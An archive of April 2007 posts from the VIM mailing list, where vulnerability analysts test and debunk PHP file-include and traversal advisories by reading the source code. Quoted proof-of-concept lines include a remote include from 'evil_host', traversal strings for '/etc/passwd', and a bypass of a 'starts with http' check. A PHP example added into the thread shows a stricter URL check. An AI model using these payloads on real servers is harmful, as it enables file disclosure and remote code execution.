Theall wrote: > The issues covered by Milw0rm 3743 / Bugtraq 23502 are a subset of those > posted back in 2002 by avart at gmx.de; eg, > > http://archives.neohapsis.com/archives/bugtraq/2002-07/0471.html > > and covered by CVE-2002-1412 / Bugtraq 5375. Or am I missing something? > > George > -- > theall at tenablesecurity.com > From theall at tenablesecurity.com Tue Apr 17 01:37:31 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 16 Apr 2007 21:37:31 -0400 Subject: [VIM] Not Quite: Ivan Gallery Script V.0.1 (index.php) Remote File Include Exploit Message-ID: <462424DB.7020604@tenablesecurity.com> Bugtraq 23519 is not quite right. It concerns the Gallery script, included as part of the Simple PHP Scripts project on SourceForge, http://sourceforge.net/projects/sphp/. The PoC accompanying the BID tries to exploit the flaw via the 'dir' parameter of the 'index.php' script. Let's have a look, though. Code in index.php from gallery-0.3.tar.bz2 looks like this: $dir = '.'; session_start(); if (empty($_SESSION['images']) || isset($_GET['reload'])) { session_destroy(); session_start(); ... if (!empty($_REQUEST['gallery'])) $_SESSION['gallery'] = $_REQUEST['gallery']; if (!empty($_SESSION['gallery'])) $dir = $_SESSION['gallery']; ... if (file_exists($dir.'/gallery.inc.php')) include($dir.'/gallery.inc.php'); $dir is initialized early on and the omitted code doesn't offer any possibility to override it via, say, some type of register globals emulation. Yet as should be obvious, there is a file include issue that can be easily exploited. It's just that an attacker needs to use the 'gallery' request parameter rather than 'dir' and ensure the session is a new one. Another problem with the advisory is that the call to file_exists() above limits the types of remote files that can be included. For example, something like 'http://www.different-site.com/cmd.txt' as used in the advisory won't fly but something like '//computername/share/filename' might. 
George -- theall at tenablesecurity.com From theall at tenablesecurity.com Tue Apr 17 02:04:30 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 16 Apr 2007 22:04:30 -0400 Subject: [VIM] False: Joomla/Mambo Jambook v1.0 beta7 Rfi Vuln. Message-ID: <46242B2E.7040903@tenablesecurity.com> Bugtraq 23509 looks false. It concerns a remote file include flaw in a third-party component for Mambo / Joomla called Jambook. I installed 1.0 beta7, which crazy_king claims is affected. Here's the code in 'components/com_jambook/jambook.php': if ( !defined( '_VALID_MOS' ) && !defined('_JEXEC') ) die( 'Direct Access to this location is not allowed.' ); global $option, $Itemid; //Get right Language file if ( file_exists( "$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php" ) ) { include_once("$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php"); } else { include_once("$mosConfig_absolute_path/components/$option/language/english.php"); } // Read configuration file include_once("$mosConfig_absolute_path/components/$option/configuration.php"); // Read a file containing the jxTemplate class require_once("$mosConfig_absolute_path/components/$option/jxtemplate.php"); // Read frontend html classes require_once( $mainframe->getPath( 'front_html' ) ); // Read database class information require_once( $mainframe->getPath( 'class' ) ); // Read a file with common functions require_once("$mosConfig_absolute_path/components/$option/jambook.common.php"); // Read a file with the CAPTCHA class require_once("$mosConfig_absolute_path/components/$option/ocr_captcha.class.php"); Clearly, this file can't be called directly, so this advisory is bogus. I wonder, though, why crazy_king felt the need to skip the first couple of similar function calls and alert us to the require_once() later on. Perhaps we'll be treated with similar warnings from him in the future... 
George
--
theall at tenablesecurity.com

From theall at tenablesecurity.com Tue Apr 17 19:23:21 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Tue, 17 Apr 2007 15:23:21 -0400
Subject: [VIM] Bugtraq 23534
Message-ID: <46251EA9.2030701@tenablesecurity.com>

Anybody seen the advisory for Bugtraq 23534 yet? It supposedly involves a remote file include issue in the Gallery script from Simple PHP Scripts and is from SekoMirza, one of the "researchers" who covered a similar "issue" in Ivan Gallery (Bugtraq 23519).

The new Bugtraq entry claims the flaw involves the 'textFile' parameter of the 'gallery_top.inc.php' script from Simple PHP Scripts Gallery 0.3. There is no such file included in the distribution nor does a grep of any of the files for 'textFile' or 'textfile' turn up anything.

So, where's the mistake? In the Bugtraq entry itself? With SekoMirza? Or perhaps just on my end?

George
--
theall at tenablesecurity.com

From jericho at attrition.org Wed Apr 18 17:35:25 2007
From: jericho at attrition.org (security curmudgeon)
Date: Wed, 18 Apr 2007 17:35:25 +0000 (UTC)
Subject: [VIM] UK ISP threatens security researcher (fwd)
Message-ID:

Until Steve and/or I can find a lot of spare time to write various things on our to-do lists regarding disclosure and vendor reaction, cross posting this here for our reference down the road.

---------- Forwarded message ----------
From: Gadi Evron
To: full-disclosure at lists.grok.org.uk
Cc: funsec at linuxbox.org
Date: Tue, 17 Apr 2007 18:30:54 -0500 (CDT)
Subject: [funsec] UK ISP threatens security researcher

http://www.theregister.com/2007/04/17/hackers_service_terminated/

"A 21-year-old college student in London had his internet service terminated and was threatened with legal action after publishing details of a critical vulnerability that can compromise the security of the ISP's subscribers."

From coley at mitre.org Thu Apr 19 08:17:08 2007
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 19 Apr 2007 04:17:08 -0400 (EDT)
Subject: [VIM] [uncertain] (mostly) phpFaber TopSites path traversal
Message-ID: <200704190817.l3J8H8ew015528@faron.mitre.org>

Who: Dr.RoVeR
Where: BUGTRAQ:20070411 nEw Bug :D
URL: http://www.securityfocus.com/archive/1/archive/1/465339/100/100/threaded

The researcher quotes a couple lines from index.php, but this is a red herring; these lines only set "page" to a static value when the provided parameter is missing or invalid.

template.php (reachable through the "template" page in admin/index.php) in the provided download has:

    if ($_GET['modify']) $_GET['modify'] = basename($_GET['modify']);

but then later we have:

    elseif($files[$_GET['modify']]){
        if(!$files[$_GET['modify']]) $err_msg = "Please select file";
        else{
            $fn = PATH_SITE.$files[$_GET['modify']];
            $content = PrepareTplData(cpReadFile($fn));
        }
    }

and $fn is later used in an include.

HOWEVER... on first glance, it seems like $files might be a whitelist, and $files is not specified in the attack url, so this conditional might not be satisfied.

But given that the researcher quoted the entirely wrong section of code, this doesn't look like a grep-and-gripe situation, so maybe I'm missing something. extra.php looks like it might have something:

    $fn = PATH_SITE.$path.$_GET['modify'];
    $content = cpReadFile($fn);

but I don't see this being directly included by template.php.

So, I'm a little mixed here.

- Steve

From gmdarkfig at gmail.com Fri Apr 20 17:58:15 2007
From: gmdarkfig at gmail.com (GM darkfig)
Date: Fri, 20 Apr 2007 19:58:15 +0200
Subject: [VIM] [uncertain] (mostly) phpFaber TopSites path traversal
In-Reply-To: <200704190817.l3J8H8ew015528@faron.mitre.org>
References: <200704190817.l3J8H8ew015528@faron.mitre.org>
Message-ID:

Hi Steven M. Christey =)

Quote from the thread:

> #Exploit:/Path/admin/index.php?page=template&modify=../../../../../../etc/passwd
> #Exploit:/Path/admin/index.php?page=template&modify=inc/config.ini.php

./admin/template.php:

    $_GET['modify'] = basename($_GET['modify']);
    [...]
    $f = array();
    $files = cpGetFldContentFiles(true,PATH_TPL);
    foreach($files as $k=>$v) $f[FLD_TPL.$v] = $v;
    $files = cpGetFldContentFiles(true,PATH_LNG);
    foreach($files as $k=>$v) $f[FLD_TPL.FLD_LNG_.$v] = $v;
    $files = cpGetFldContentFiles(true);
    $skin = $ini->read('APPLICATION', 'skin').'/';
    foreach($files as $k=>$v) $f[FLD_SKIN.$skin.$v] = $v;
    $files = $f;
    $files = array_flip($files);
    [...]
    elseif($files[$_GET['modify']]){
        if(!$files[$_GET['modify']]) $err_msg = "Please select file";
        else{
            $fn = PATH_SITE.$files[$_GET['modify']];
            $content = PrepareTplData(cpReadFile($fn));
        }
    [...]
    function PrepareTplData($s, $back = false) {
        if (!$back) {
            $s = htmlspecialchars($s);
            return $s;
        } else {
            $s = stripslashes($s);
            return ReverseHtmlchars($s);
        }
    }

./inc/lib/lib.inc.php:

    function cpReadFile($fn){
        return @implode('', @file($fn));
    }

This can lead to file disclosure, but this can't be exploited. You can't use ../ because basename() is applied to $_GET['modify'] and the malicious value is not in the array $files, so this is not vulnerable to these exploits. Tested.

2007/4/19, Steven M. Christey :
>
> Who: Dr.RoVeR
> Where: BUGTRAQ:20070411 nEw Bug :D
> URL:http://www.securityfocus.com/archive/1/archive/1/465339/100/100/threaded
>
> The researcher quotes a couple lines from index.php, but this is a red
> herring; these lines only set "page" to a static value when the
> provided parameter is missing or invalid.
>
> template.php (reachable through the "template" page in
> admin/index.php) in the provided download has:
>
> if ($_GET['modify']) $_GET['modify'] = basename($_GET['modify']);
>
> but then later we have:
>
> elseif($files[$_GET['modify']]){
>     if(!$files[$_GET['modify']]) $err_msg = "Please select file";
>     else{
>         $fn = PATH_SITE.$files[$_GET['modify']];
>         $content = PrepareTplData(cpReadFile($fn));
>     }
> }
>
> and $fn is later used in an include.
>
> HOWEVER... on first glance, it seems like $files might be a whitelist,
> and $files is not specified in the attack url, so this conditional
> might not be satisfied.
>
> But given that the researcher quoted the entirely wrong section of
> code, this doesn't look like a grep-and-gripe situation, so maybe I'm
> missing something. extra.php looks like it might have something:
>
> $fn = PATH_SITE.$path.$_GET['modify'];
> $content = cpReadFile($fn);
>
> but I don't see this being directly included by template.php.
>
> So, I'm a little mixed here.
>
> - Steve
>

From coley at linus.mitre.org Sun Apr 22 19:16:48 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Sun, 22 Apr 2007 15:16:48 -0400 (EDT)
Subject: [VIM] vendor ack/clarification for CVE-2007-1888 (SQLite)
Message-ID:

key points: only version 2 is affected, which is an older version that isn't used very much, except by PHP; and the relevant function was not intended to handle attacker-controlled inputs.

---------- Forwarded message ----------
Date: Thu, 19 Apr 2007 16:00:26 +0000
Subject: CVE-2007-1888

Gentle People,

I am the original author and the principal architect of the SQLite embedded database engine referenced in CVE-2007-1888. I have not been contacted about this alleged vulnerability. I discovered it while doing a Google search. I have investigated the bug and have the following findings:

* The alleged bug occurs in the source file "encode.c". That file was removed from the SQLite source tree in September of 2004. That file and the operations it encodes are no longer a part of SQLite. Legacy versions of SQLite that make use of this old file are still available, but the use of those legacy versions is discouraged. As far as we are aware, PHP is the only software still using this archaic version of SQLite.

* The vulnerability in question is arguably a case of PHP misusing the sqlite_decode_binary() API. While it is true that sqlite_decode_binary() might be made more robust in the face of malformed inputs, sqlite_decode_binary() was never intended to be used in that context.

This bug applies to SQLite version 2 only, and then only to very specific and narrow uses of SQLite version 2. There are countless users of SQLite in the wild, but apart from PHP, they are almost all SQLite 3 users. This bug has zero impact on the overwhelming majority of SQLite users. In order to avoid unnecessarily alarming the many users of SQLite version 3, in any official announcement of this vulnerability, you should make it clear that the vulnerability only applies to SQLite version 2 and then only to users who make use of the sqlite_decode_binary() function with an unchecked input.

Thanks.

From str0ke at milw0rm.com Sun Apr 22 19:30:22 2007
From: str0ke at milw0rm.com (str0ke)
Date: Sun, 22 Apr 2007 14:30:22 -0500
Subject: [VIM] false: turbolence core 0.0.1 alpha Remote File Inclusion
Message-ID: <814b9d50704221230gbfd792bp8911d402c075ecce@mail.gmail.com>

Since the tdb_connect function doesn't exist in the script (or included in the script) it will die with a fatal error.

/str0ke

---------- Forwarded message ----------
From: omnipresent at email.it
Date: 21 Apr 2007 10:55:11 -0000
Subject: turbolence core 0.0.1 alpha Remote File Inclusion
To: bugtraq at securityfocus.com

"turbulence core.0.0.1-alpha - REMOTE FILE INCLUSION" by Omni

1) Infos
---------

Date : 2007-04-20
Product : turbulence core
Version : 0.0.1 alpha
Vendor : http://sourceforge.net/projects/turbulence
Vendor Status : 2007-04-20 -> Not Informed!
                2007-04-21 -> Vendor Informed!
Description : PHP Turbulence is a suite of PHP scripts that work together in unison. They do not require one another to be present, but work perfectly together. The intent of the project is to eliminate the need to download a PHP message board, PHP news, PHP user management.
Source : omnipresent - omni
E-mail : omnipresent @ email . it - omni @ playhack . net
Team : Playhack.net Security

2) Security Issues
-------------------

--- [ Remote File Inclusion Vulnerability ] ---
===============================================

[ /user/turbolence.php - Line 34 - 39 ]

    [...]
    $tdbconn = tdb_connect($GLOBALS['tdb']);
    if (!$tdbconn) decho("Database Connection Failed...");
    decho("Database Connection: ".$tdbconn);
    include($GLOBALS['tcore'].'/user/session.inc');
    if ($GLOBALS['login']) {
    [...]

[ end script turbolence.php ]

As you can see the variable $GLOBALS['tcode'] is not properly sanitized before being used; so an attacker can gain access to the shell by using a crafted URL.

--- [ PoC ] ---
===============

Tested on a php.ini configuration as follows:

    register_global = On
    allow_url_unclude = On

RFI:
http://127.0.0.1/user/turbulence.php?GLOBALS[tcore]=http://evil_host/evil_script.txt?

LFI:
http://127.0.0.1/turbulence.php?GLOBALS[tcore]=../../../../../../../../../../../../etc/passwd%00

---- [ Patch ] ----

1. Edit the source code to ensure that the input is validated.
2. To avoid Remote File Inclusion turn Off allow_url_include.

From theall at tenablesecurity.com Mon Apr 23 20:40:32 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Mon, 23 Apr 2007 16:40:32 -0400
Subject: [VIM] Almost: claroline <= Multiple Remote File Include Vulnerability
Message-ID: <462D19C0.4070509@tenablesecurity.com>

Anyone else seen this (BID 23609)?

http://www.securityfocus.com/archive/1/466661/30/0/threaded

Looking at the code from http://www.e-learningone.it/software_free/e-learning/claroline175.zip, I don't see a file named 'rootSys' in 'claroline/inc/lib'. Nor does it seem like the flaw lies in the 'index.php' file in that directory -- it has one executable line of code:

    header("Location:../../../");

There is, though, a file named 'export_exe_tracking.class.php' that is probably what he was talking about. Its first non-comment line is:

    include_once($rootSys.$clarolineRepositoryAppend.'exercice/question.class.php');

And the issue was corrected with some patches on 10 May 2006; ie,

http://www.claroline.net/wiki/index.php/Talk:Manual_security_hack_in_1.6_and_1.7

George
--
theall at tenablesecurity.com

From coley at mitre.org Wed Apr 25 16:13:44 2007
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 25 Apr 2007 12:13:44 -0400 (EDT)
Subject: [VIM] [false but true] "Allfaclassfieds" RFI no; PHP Classifieds yes
Message-ID: <200704251613.l3PGDipF017520@faron.mitre.org>

Researcher: Dr.RoVeR
Ref: Allfaclassfieds (level2.php dir) remote file inclusion
http://www.securityfocus.com/archive/1/archive/1/466648/100/0/threaded

With a name like "allfaclassfieds" that smelled like a typo, I investigated a little bit more. The referenced download URL creates a directory "phpclassifides". No mention of "allfa" is anywhere according to grep. Further grep finds this to be PHP Classifieds.

The presence of a "upgr_603_to_604.php" file, and most files dating back to 2001, along with UPGRADE.txt, suggests an old version of 6.04; latest version, released on April 14, is 7.2b. The relevant RFI code does not appear in level2.php in the newer version.
But in admin/setup/level2.php in 6.04, we have:

    require("$dir/admin/db.php");

as the first executable PHP code.

The installation appears to move from level1.php through level5.php; the latter deletes the install file. However, there's not any evidence that the level*.php files are ever cleaned up, leaving them open for later access.

- Steve

From coley at mitre.org Wed Apr 25 18:10:50 2007
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 25 Apr 2007 14:10:50 -0400 (EDT)
Subject: [VIM] [true] Quick and Dirty Blog RFI
Message-ID: <200704251810.l3PIAoUK021190@faron.mitre.org>

Ref: MILW0RM:3729
Researcher: Omni

Verified by a CVE analyst using source inspection. Post mentions "index.php" but the relevant lines are in categories.php. The lines quoted by the researcher are the first executable lines in the file.

- Steve

From theall at tenablesecurity.com Thu Apr 26 00:14:59 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Wed, 25 Apr 2007 20:14:59 -0400
Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure
Message-ID: <462FEF03.1020802@tenablesecurity.com>

Someone help me out please...

Milw0rm 3800 / Bugtraq 23643 are for a flaw that looks like a directory traversal; ie,

    Exploit:[Path_ext]/examples/layout/feed-proxy.php?feed=../../../../../../etc/passwd

Yet when I look at the code from either version 1.0 alpha 1 (from ), which is supposedly affected, or 1.0 (from ), the latest version, the affected file has the following code:

    $feed = $_REQUEST['feed'];
    if($feed != '' && strpos($feed, 'http') === 0){
        header('Content-Type: text/xml');
        readfile($feed);
        return;
    }

Now doesn't the strpos() along with the "===" test mean that the feed parameter must start with "http"??? So did Alkomandoz Hacker bother to test his/her proof of concept???

Now I suppose if the remote has allow_url_fopen enabled, you might be able to abuse this to try to hide yourself from attacks against third-party sites, but that's a separate issue.
George
--
theall at tenablesecurity.com

From coley at linus.mitre.org Thu Apr 26 00:36:47 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 25 Apr 2007 20:36:47 -0400 (EDT)
Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure
In-Reply-To: <462FEF03.1020802@tenablesecurity.com>
References: <462FEF03.1020802@tenablesecurity.com>
Message-ID:

On Wed, 25 Apr 2007, George A. Theall wrote:

> if($feed != '' && strpos($feed, 'http') === 0){
>     header('Content-Type: text/xml');
>     readfile($feed);
>     return;
> }
>
> Now doesn't the strpos() along with the "===" test mean that the feed
> parameter must start with "http"??? So did Alkomandoz Hacker bother to
> test his/her proof of concept???

Just guessing here... http://us2.php.net/manual/en/function.strpos.php says that strpos "may return Boolean FALSE, but may also return a non-Boolean value which evaluates to FALSE, such as 0". The question then becomes how "===" is handled, and whether it's handled uniformly across all PHP versions and configs.

BUT...

There's still an issue if you do this:

    http/../../../../etc/passwd

would pass the test and be useful as a directory traversal attack.

(I verified that my PHP 4.4.4 will accept an "up-and-down" traversal with a non-existent subdirectory. This usually works in other traversal scenarios too, not just PHP.)

There's a possibility that $feed is processed elsewhere, but I didn't look at the code.

> Now I suppose if the remote has allow_url_fopen enabled, you might be
> able to abuse this to try to hide yourself from attacks against
> third-party sites, but that's a separate issue.

readfile() with a URL can also be used for XSS, although people concentrate so much on RFI that they don't bother pointing this out.

You bring up a very interesting attack angle for attacks against third-party sites - readfile() as an attack proxy. I LOVE it! Wonder if it's being used in real-world attacks.

PHP, oh PHP, the intricate beauty of your gifts is eternal.
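The strpos() === 0 test discussed above, placed beside a stricter check, as an added example that is not part of the thread and not code from the ext project: the strict version parses the value as a URL and requires an http(s) scheme and an allow-listed host, which rejects the http/../ traversal string regardless of how readfile() normalises paths and also closes the readfile()-as-proxy use raised above. The function names, the allow-list and the sample inputs are constructed for this example.

```php
<?php
// Added example (not from the thread or from ext): the weak "starts with
// http" test next to a stricter URL check. Names and inputs are constructed.

// The original test as quoted in the thread: strpos() === 0 only proves the
// string *begins* with the four characters "http".
function weak_feed_check(string $feed): bool
{
    return $feed != '' && strpos($feed, 'http') === 0;
}

// Stricter check: the value must parse as an absolute URL with an http(s)
// scheme and a host, and that host must be on an explicit allow-list.
// "http/../../etc/passwd" has neither scheme nor host, so it fails here
// before any filesystem call is made; an arbitrary third-party host fails
// the allow-list, so the script cannot be used as a fetch proxy.
function strict_feed_check(string $feed, array $allowed_hosts): bool
{
    $parts = parse_url($feed);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // Userinfo and explicit ports are common ways to confuse host matching
    // ("http://good.example.com@evil.example.net/"), so reject them outright.
    if (isset($parts['user']) || isset($parts['pass']) || isset($parts['port'])) {
        return false;
    }
    return in_array(strtolower($parts['host']), $allowed_hosts, true);
}

// Constructed inputs: the traversal string from the thread, a feed on the
// permitted host, a feed on an unrelated host, a file:// URL, and a
// userinfo trick that looks like the permitted host at first glance.
$allowed = ['feeds.example.com'];
$samples = [
    'http/../../../../etc/passwd',
    'http://feeds.example.com/rss.xml',
    'http://www.different-site.com/cmd.txt',
    'file:///etc/passwd',
    'http://feeds.example.com@evil.example.net/rss.xml',
];

foreach ($samples as $s) {
    printf("%-52s weak=%-5s strict=%s\n", $s,
        weak_feed_check($s) ? 'pass' : 'fail',
        strict_feed_check($s, $allowed) ? 'pass' : 'fail');
}
```

Only the second sample passes the strict check; the first and third pass the weak one, which is exactly the gap the thread describes.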
- Steve

From theall at tenablesecurity.com Thu Apr 26 01:06:49 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Wed, 25 Apr 2007 21:06:49 -0400
Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure
In-Reply-To:
References: <462FEF03.1020802@tenablesecurity.com>
Message-ID: <462FFB29.7070306@tenablesecurity.com>

On 04/25/07 20:36, Steven M. Christey wrote:

> says that strpos "may return Boolean FALSE, but may also return a
> non-Boolean value which evaluates to FALSE, such as 0". The question then
> becomes how "===" is handled, and whether it's handled uniformly across
> all PHP versions and configs.

It's a PHP 4+ thingy -- the two arguments must compare equal *and* be of the same type. AFAIK, its behaviour doesn't depend on any configuration settings.

> There's still an issue if you do this:
>
> http/../../../../etc/passwd
>
> would pass the test and be useful as a directory traversal attack.
>
> (I verified that my PHP 4.4.4 will accept an "up-and-down" traversal with
> a non-existent subdirectory. This usually works in other traversal
> scenarios too, not just PHP.)

I think that works under Windows but not *nix.

> There's a possibility that $feed is processed elsewhere, but I didn't look
> at the code.

I quoted all of it before, only leaving out a comment and the PHP tags at the start / end.

George
--
theall at tenablesecurity.com

From coley at linus.mitre.org Thu Apr 26 01:19:19 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 25 Apr 2007 21:19:19 -0400 (EDT)
Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure
In-Reply-To: <462FFB29.7070306@tenablesecurity.com>
References: <462FEF03.1020802@tenablesecurity.com> <462FFB29.7070306@tenablesecurity.com>
Message-ID:

On Wed, 25 Apr 2007, George A. Theall wrote:

> > (I verified that my PHP 4.4.4 will accept an "up-and-down" traversal with
> > a non-existent subdirectory. This usually works in other traversal
> > scenarios too, not just PHP.)
>
> I think that works under Windows but not *nix.

For PHP anyway, it works like a charm on my Solaris box.

    $feed = "http/../../../test.txt";
    if($feed != '' && strpos($feed, 'http') === 0){
        readfile($feed);
    }

(where test.txt is my default directory traversal test file, and the PHP app's location doesn't have an http subdirectory).

That said, I vaguely remember running across situations where a non-existent subdirectory would prevent an attack from working; maybe there are variations depending on whether realpath() is used or not?

- Steve

From theall at tenablesecurity.com Thu Apr 26 02:01:45 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Wed, 25 Apr 2007 22:01:45 -0400
Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure
In-Reply-To:
References: <462FEF03.1020802@tenablesecurity.com> <462FFB29.7070306@tenablesecurity.com>
Message-ID: <46300809.9090001@tenablesecurity.com>

On 04/25/07 21:19, Steven M. Christey wrote:

> For PHP anyway, it works like a charm on my Solaris box.
>
> $feed = "http/../../../test.txt";
> if($feed != '' && strpos($feed, 'http') === 0){
>     readfile($feed);
> }
>
> (where test.txt is my default directory traversal test file, and the PHP
> app's location doesn't have an http subdirectory).

Hmmm, I didn't realize Solaris behaved this way.

> That said, I vaguely remember running across situations where a
> non-existent subdirectory would prevent an attack from working; maybe
> there are variations depending on whether realpath() is used or not?

I figured it was more of an OS feature; eg, try something like:

    ls foo/../../../../../          (*nix)
    dir foo\..\..\..\..\..\..\      (Windows)

from a directory not too far off root.

Btw, I just tried this on Solaris 10 -- it produced an error rather than a directory listing.
George
--
theall at tenablesecurity.com

From noamr at beyondsecurity.com Thu Apr 26 07:37:30 2007
From: noamr at beyondsecurity.com (Noam Rathaus)
Date: Thu, 26 Apr 2007 10:37:30 +0300
Subject: [VIM] [UNKNOWN] WordPress v2.1.3 >> remote file include~
Message-ID: <200704261037.30597.noamr@beyondsecurity.com>

Hi,

I am unable to confirm this, anyone?

Looks fake, and untrue, wp-settings.php doesn't use anything called require_once? weird

---------- Forwarded Message ----------

Subject: WordPress v2.1.3 >> remote file include~
Date: Wednesday 25 April 2007 11:17
From: s433d_only_linux at yahoo.de
To: bugtraq at securityfocus.com

by : www.hackeraz.ir userz , saeid...
++++++++++++++++++++++++++++++++++++
####################################################
#WordPress >> 2.1.3 Remote File Inclusion #
####################################################
Affected Software .: WordPress >> 2.1.3 #
Download..: http://wordpress-deutschland.org #
Risk ..............: high #
Date .........: 25/4/2007 #
Found by ..........: s433d_only_linux #
Contact ...........: s433d_only_linux at yahoo.de #
Web .............: Www.hackerz.ir #
special thanx ........... Ali Jasbi my best friend#
####################################################
Affected File: #
wordpress/wp-settings.php #
wordpress/wp-includes/template-loader.php #
wordpress/wp-includes/theme.php #
####################################################
Exploit:
wordpress/wp-settings.php?require_once=shell?
wordpress/wp-includes/template-loader.php?include=shell?
wordpress/wp-includes/theme.php?require_once=shell?
######################################################

-------------------------------------------------------

--
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com

From heinbockel at mitre.org Thu Apr 26 12:19:48 2007
From: heinbockel at mitre.org (Heinbockel, Bill)
Date: Thu, 26 Apr 2007 08:19:48 -0400
Subject: [VIM] FALSE --> RE: [UNKNOWN] WordPress v2.1.3 >> remote file include~
In-Reply-To: <200704261037.30597.noamr@beyondsecurity.com>
References: <200704261037.30597.noamr@beyondsecurity.com>
Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC01C6B001@IMCSRV5.MITRE.ORG>

Looks like someone is using untested automated tools that report the wrong issue, or is totally clueless:

From Wordpress 2.1.3:

    $ grep -n -i require_once wp-settings.php
    100:    require_once (ABSPATH . WPINC . '/wp-db.php
    140:require_once (ABSPATH . WPINC . '/l10n.php');
    247:        require_once($locale_file);
    250:require_once(ABSPATH . WPINC . '/locale.php');

The only parameter here that *might* be vulnerable is $locale_file around line 247:

    $locale = get_locale();
    $locale_file = ABSPATH . LANGDIR . "/$locale.php";
    if ( is_readable($locale_file) )
        require_once($locale_file);

In wp-includes/l10n.php:

    function get_locale() {
        global $locale;

        if (isset($locale))
            return apply_filters( 'locale', $locale );

        // WPLANG is defined in wp-config.
        if (defined('WPLANG'))
            $locale = WPLANG;

        if (empty($locale))
            $locale = '';

        $locale = apply_filters('locale', $locale);
        return $locale;
    }

So, if WPLANG is not defined and the $locale value is able to bypass whatever filters are defined in apply_filters, a PoC like "wordpress/wp-settings.php?locale=shell?" MAY work.

Other than that, everything in wp-includes/themes.php is contained within a function declaration and wp-includes/template-loader.php looks to be okay.

Just another incompetent vulnerability researcher posting bogus reports. Why must PHP punish us so? ;-)

William Heinbockel
Infosec Engineer, Sr.
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615

>-----Original Message-----
>From: vim-bounces at attrition.org
>[mailto:vim-bounces at attrition.org] On Behalf Of Noam Rathaus
>Sent: Thursday, 26 April, 2007 03:38
>To: Vulnerability Information Managers
>Subject: [VIM] [UNKNOWN] WordPress v2.1.3 >> remote file include~
>
>Hi,
>
>I am unable to confirm this, anyone?
>
>Looks fake, and untrue, wp-settings.php doesn't use anything called
>require_once? weird
>
>---------- Forwarded Message ----------
>
>Subject: WordPress v2.1.3 >> remote file include~
>Date: Wednesday 25 April 2007 11:17
>From: s433d_only_linux at yahoo.de
>To: bugtraq at securityfocus.com
>
>by : www.hackeraz.ir userz , saeid...
>++++++++++++++++++++++++++++++++++++
>####################################################
>#WordPress >> 2.1.3 Remote File Inclusion #
>####################################################
>Affected Software .: WordPress >> 2.1.3 #
>Download..: http://wordpress-deutschland.org #
>Risk ..............: high #
>Date .........: 25/4/2007 #
>Found by ..........: s433d_only_linux #
>Contact ...........: s433d_only_linux at yahoo.de #
>Web .............: Www.hackerz.ir #
>special thanx ........... Ali Jasbi my best friend#
>####################################################
>Affected File: #
>wordpress/wp-settings.php #
>wordpress/wp-includes/template-loader.php #
>wordpress/wp-includes/theme.php #
>####################################################
>Exploit:
>wordpress/wp-settings.php?require_once=shell?
>wordpress/wp-includes/template-loader.php?include=shell?
>wordpress/wp-includes/theme.php?require_once=shell?
>######################################################
>
>-------------------------------------------------------
>
>--
>Noam Rathaus
>CTO
>1616 Anderson Rd.
>McLean, VA 22102
>Tel: 703.286.7725 extension 105
>Fax: 888.667.7740
>noamr at beyondsecurity.com
>http://www.beyondsecurity.com
>

From str0ke at milw0rm.com Thu Apr 26 13:39:03 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 26 Apr 2007 08:39:03 -0500
Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure
In-Reply-To: <46300809.9090001@tenablesecurity.com>
References: <462FEF03.1020802@tenablesecurity.com> <462FFB29.7070306@tenablesecurity.com> <46300809.9090001@tenablesecurity.com>
Message-ID: <814b9d50704260639m74923caewa29fd2f7373f1b21@mail.gmail.com>

Tested with php4 + debian latest and worked just fine.

/str0ke

On 4/25/07, George A. Theall wrote:
> On 04/25/07 21:19, Steven M. Christey wrote:
>
> > For PHP anyway, it works like a charm on my Solaris box.
> >
> > $feed = "http/../../../test.txt";
> > if($feed != '' && strpos($feed, 'http') === 0){
> >     readfile($feed);
> > }
> >
> > (where test.txt is my default directory traversal test file, and the PHP
> > app's location doesn't have an http subdirectory).
>
> Hmmm, I didn't realize Solaris behaved this way.
>
> > That said, I vaguely remember running across situations where a
> > non-existent subdirectory would prevent an attack from working; maybe
> > there are variations depending on whether realpath() is used or not?
>
> I figured it was more of an OS feature; eg, try something like:
>
> ls foo/../../../../../ (*nix)
> dir foo\..\..\..\..\..\..\ (Windows)
>
> from a directory not too far off root.
>
> Btw, I just tried this on Solaris 10 -- it produced an error rather than
> a directory listing.
>
> George
> --
> theall at tenablesecurity.com
>

From str0ke at milw0rm.com Thu Apr 26 13:41:27 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 26 Apr 2007 08:41:27 -0500
Subject: [VIM] False: ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure
In-Reply-To: <814b9d50704260639m74923caewa29fd2f7373f1b21@mail.gmail.com>
References: <462FEF03.1020802@tenablesecurity.com> <462FFB29.7070306@tenablesecurity.com> <46300809.9090001@tenablesecurity.com> <814b9d50704260639m74923caewa29fd2f7373f1b21@mail.gmail.com>
